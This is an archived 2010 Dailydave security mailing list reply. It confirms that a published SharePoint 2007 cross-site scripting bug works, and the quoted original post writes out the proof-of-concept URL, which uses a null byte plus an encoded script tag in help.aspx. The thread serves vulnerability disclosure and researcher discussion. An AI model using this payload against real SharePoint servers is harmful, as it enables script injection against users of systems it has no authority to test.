Dailydave mailing list archives

Re: Sharepoint FTW! :>

From: pUm <hijacka () googlemail com>
Date: Fri, 30 Apr 2010 08:04:47 +0100

yeah, just checked it yesterday and it works - pretty interesting to
see that the null character is really needed

2010/4/29 dave <dave () immunityinc com>:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Has anyone checked out this Sharepoint 2007 XSS? Does it work? Sharepoint is one of
the single largest data security risks in most large Enterprises and everyone pretty
much ignores it, which is always funny. :>

http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html

This is the string that's supposed to work. Someone try it and let us all know! :>

http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

- -dave
(Note: I'm recovering from an illness - your emails will be answered in the order
they were received!)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkvZ4psACgkQtehAhL0ghep4lQCcDY4wc2y9Icx/1oyd+oFgNMun
VPwAnAnc4dDlUFXVyS3NtsKHdkyG/Q73
=eAv+
-----END PGP SIGNATURE-----
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave

Current thread:

Sharepoint FTW! :> dave (Apr 29)
- Re: Sharepoint FTW! :> pUm (Apr 30)
- Re: Sharepoint FTW! :> Steve Shockley (Apr 30)
- Re: Sharepoint FTW! :> NeZa (Apr 30)